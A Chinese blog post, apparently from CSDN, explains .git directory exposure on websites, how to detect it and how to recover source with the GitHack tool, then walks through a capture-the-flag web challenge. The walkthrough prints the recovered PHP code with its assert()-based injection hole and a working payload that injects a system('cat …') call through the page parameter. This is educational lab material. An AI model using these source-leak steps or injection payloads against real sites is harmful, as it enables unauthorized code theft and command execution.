初识.git文件泄露

已于 2025-03-02 18:58:06 修改
阅读量911 收藏 25
点赞数 9
文章标签: git
于 2025-02-24 21:08:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wyjcxyyy/article/details/145837092
版权

.git 文件泄露 

当在一个空目录执行 git init 时,Git 会创建一个 .git 目录。 这个目录包含所有的 Git 存储和操作的对象。 如果想备份或复制一个版本库,只需把这个目录拷贝至另一处就可以了

这是一种常见的安全漏洞,指的是网站的 .git 目录被意外暴露在公网上,导致攻击者可以通过访问 .git 目录获取网站的源代码、版本历史、配置文件等敏感信息。这种漏洞通常是由于服务器配置不当或开发人员的疏忽导致的。

如何检测 .git 文件泄露?

  • 手动检测

    • 访问 http://example.com/.git/,如果返回目录列表或 200 状态码,则说明 .git 目录可能被泄露。

  • 工具检测

    使用工具自动检测 .git 目录泄露,例如 GitHack,Gittools

 安装使用GitHack

github上的githack可以把整个.git备份的文件下载下来。它能解析 .git/index 文件,并找到工程中所有的:文件名和文件 sha1,然后去 .git/objects/ 文件夹下下载对应的文件,通过 zlib 解压文件,按原始的目录结构写入源代码

我是在kali中安装使用的,下载链接

git clone https://github.com/BugScanTeam/GitHack

使用前先检查python的版本,githack要在python2中使用,我的kali装的时python3.9,但是kali本身有python2版本,使用命令

python2 GitHack.py 链接/.git

注意下载后文件夹会有一个GitHack文件,使用GitHack前先使用命令 cd GitHack
使用后在GitHack/dist中会有恢复完整的源代码。

注意使用时目标链接要是http,不能是https,否则得到的文件夹为空

 攻防世界-WEB-mfw

启动靶机后界面如图

 查看源码后发现注释有提示 ?page=flag,尝试后发现不行,然后有用dirsearch扫面

 发现了.git,尝试后发现能成功访问,可以证明是git文件泄露,然后用GitHack,payload:

python2 GitHack.py My PHP Website/.git

先看flag.php文件

<?php
// TODO
// $FLAG = '';
?>

 啥也没有

再查看index.php文件得到源码

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>
<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		
		<title>My PHP Website</title>
		
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
	</head>
	<body>
		<nav class="navbar navbar-inverse navbar-fixed-top">
			<div class="container">
		    	<div class="navbar-header">
		    		<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
		            	<span class="sr-only">Toggle navigation</span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		          	</button>
		          	<a class="navbar-brand" href="#">Project name</a>
		        </div>
		        <div id="navbar" class="collapse navbar-collapse">
		          	<ul class="nav navbar-nav">
		            	<li <?php if ($page == "home") { ?>class="active"<?php } ?>>Home</li>
		            	<li <?php if ($page == "about") { ?>class="active"<?php } ?>>About</li>
		            	<li <?php if ($page == "contact") { ?>class="active"<?php } ?>>Contact</li>
						<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>>My secrets</li> -->
		          	</ul>
		        </div>
		    </div>
		</nav>
		
		<div class="container" style="margin-top: 50px">
			<?php
				require_once $file;
			?>
			
		</div>

我们只需要看关键部分即可

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

代码先检查url参数中是否有page参数,并将其赋值给$page,否则$page默认为home,然后再将$page拼接到%$file中

例:若$page=about,则$file=templates/about.php.

下面时对".."过滤防止目录遍历攻击,

strpos 是 PHP 的一个字符串函数,用于查找子字符串在字符串中的位置。如果file中含有".."会返回他的位置(从0开始)若返回的是4,则4===false为假,执行后面的die语句,程序结束。

若不含程序继续执行,然后检查$file是否存在,若不存在执行die语句程序结束。

assert 的参数是一个字符串,PHP会将其作为代码执行。

这就是突破口,利用这个构造payload

?page=').system("cat ./templates/flag.php");// 

拼接后的代码为

assert("strpos('templates/').system("cat ./templates/flag.php");// .php', '..') === false");

前面的strpos构成闭合并且为ture,然后执行后面的命令,命令后面的内容被注释掉了不用管

得到flag

wyjcxyyy
关注
Gitleaks - 一款高效的Github仓库敏感信息泄露查询工具
大河之犬的博客
12-08 1917
Gitleaks 是一种 SAST 工具,用于检测和防止 git 存储库中的硬编码机密,如密码、API 密钥和令牌Gitleaks 是一个开源工具,用于检测和防止签入 Git 存储库的机密(密码/API 密钥)。Gitleaks 的主要优点是它不仅可以扫描您最新的源代码,还可以扫描整个 git 历史记录,识别过去提交到您的源代码的任何秘密Github地址。
git信息泄露漏洞
jelly
07-27 9670
git泄露漏洞 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 危害 攻击者可以利用该漏洞下载git文件夹里的所有内容。如果文件夹内有敏感信息比如站点源码、数据库账户密码等,攻击者可能直接控制服务器。 Git介绍 Git作为大家熟悉的,深受欢迎的版本控制工具,和其他同类工具有很多不同之处: Git始终保存快照而不是文件差异。 任何数据存储前始终使用SHA-1计算校验和,保证内容完整性。 使用分布式仓库设计,让大多数
git泄露
2401_82388450的博客
04-16 2901
git log --pretty=oneline //加参,简洁查看$ git reflog //查看每一次修改历史$ cat test.txt //查看文件内容$ git status //查看工作区中文件当前状态。
Git泄露
cyy001128的博客
04-23 2315
通过git stash存储的修改列表,可以通过git stash list查看,git stash show用于校验,git stash apply用于重新存储,直接执行git stash等同于git stash save,执行 git stash pop 是恢复文件。前几步大致相同,都是用dirsearch扫描是否存在git漏洞,然后打开githack连接,后面则是分为git log,git stash和git index几种。用git reset --hard 回退版本,打开文件夹可找到flag。
信息搜集-Git信息泄露
qq_25899635的博客
05-20 1662
Git仓库介绍 Git(读音为/gIt/.)是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。 https://git-scm.com/ 通过git init创建一个仓库。 Git信息泄露原理 通过泄露.git文件夹下的文件,还原重建工程源代码。 解析.git/index文件,找到工程中所有的: (文件名,文件sha1) 去.git/objects/文件夹下载对...
信息泄露-小白初识
small_whitehat的博客
02-21 1403
网站敏感信息源码泄露
Python脚本初识:自动化文件初始化与环境配置
虽然将凭证存储在环境变量中比直接在代码中硬编码更为安全,但仍需保证这些信息不被泄露。此外,当在公共平台共享代码或仓库时,应避免提交包含敏感信息的文件。可以使用.gitignore文件来忽略这些文件,防止它们被...
git应用那点事
MathYounG的博客
07-12 407
文章目录Git一、初识Git1.1 Git的简史1.2 Git到底是什么?1.3 什么是版本控制系统?1.3.1 版本控制系统的作用1.4 版本控制系统的分类(了解)1.5 分布式与集中式1.5.1 集中式1.5.2 分布式1.5.3 分布式与集中式的区别1.6 Git的下载安装1.7 安装后测试1.7.1 打开命令的两种方式1.7.3 命令查看Git版本号1.7.2 提交版本控制人信息二、仓库2.1 仓库是什么?2.2 基本结构2.3 仓库基本命令操作2.4 日志命令操作2.5 版本回退命令操作2.6 文
初识Django 3.0配置文件:什么是配置文件及其作用
# 1. I. 简介 ## A.... Django是一个开放源代码的Web应用程序框架,由Python编写而成。它遵循MVC(Model-View-Controller)设计模式,旨在帮助开发人员快速构建高质量、易维护的Web应用程序。... 为什么需要配置文件
初识Django3.0:配置文件的作用和结构
# 1. 引言 ## 1.1 什么是Django 3.0 ...Django配置文件是一个存储Django项目设置的文件,它包含了许多重要的配置选项,用于定义项目的行为和特性。通过配置文件,开发人员可以灵活地调整和定制项目的各个方面
.git泄露
qq_46277212的博客
11-06 876
漏洞简介 开发人员在开发过程中遗忘删除 .git 文件夹,导致攻击者可以通过 .git 文件夹中的信息获取开发人员提交过的所有源码。从而导致服务器被攻击沦陷 如何访问 127.0.0.1/.git 或127.0.0.1/.git/config 如果有文件内容返回,则有 .git 文件泄露 GitHack是一个测试.git泄露的脚本,git信息泄露危害很大。 例如:python2 GitHack.py http://192.168.6.32/.git 看到输出后,进入到给出的目录下。 ...
git泄露(一篇文章就够了)
最新发布
m0_67170526的博客
01-13 1851
当大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境,这就引起了git泄露漏洞。通过git泄露,我们可以获取到源代码、提交历史、分支信息、配置信息、开发者信息和一些其他敏感信息。git泄露在ctf中的应用绝大部分是和代码审计一起出的,往往是ctfweb题中的第一步,所以至关重要。
Git信息泄露
qq_43776408的博客
05-27 494
Git仓库管理 git是linux内核开发者开发的,目的是为了更好的更方便的管理linux内核 当年那个开发者年仅21岁,对计算机痴迷般的热爱 最后那个新建的git目录是以后我们要利用的漏洞 Git信息泄露原理 第二步要下载的文件其实就是第一步找到的文件 我很好奇为啥第一步找到了不直接下载? Git实验环境搭建 kali上步骤 以apache服务为例 你先切换到apache服务目录 然后启动apache服务器 在该目录下新建一个文件夹叫git_test 然后在该目录下新建一个git仓库 git ini
Git泄露相关知识点
2201_75437983的博客
10-18 1698
点开看了以后里面什么都没有,注意这里一定要进去到了文件里面以后再打开终端,执行git log,git log 显示到HEAD所指向的commit为止的所有commit记录,简单说来就是可以查看之前版本的记录(删除了的看不见),git reflog和git log功能一样(删除了的也能查看)。可以看到我们git log以后我们能看到三个版本的哈希值,一个是现在所在的版本(remove flag),一个是前版本(add flag),一个是初始化的版本(init),而我们现在的版本大家也看到的是空白的一个文件
Git泄露_Log
Mr_admin的博客
09-23 2281
刚开始的时候不知道git命令,直接百度。做后确定命令格式为:python2 GitHack.py http://challenge-4e45df1c40b42551.sandbox.ctfhub.com:10800/.git/当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。我用的是新版kali环境做的题目(kali日期为2022-3,这个版本安装了python2和python3。后面使用命令要注意,我在这里踩坑了。先是捣鼓git软件怎么使用。
Git文件泄露利用
tpaer的博客
08-02 1919
在开发提交代码或打包项目的过程中,如果配置不当,可能会将.git文件夹直接部署到线上环境。这就可能会引起git泄露漏洞。
git源代码泄露
qq_53099802的博客
05-27 3576
git泄露和php的assert漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值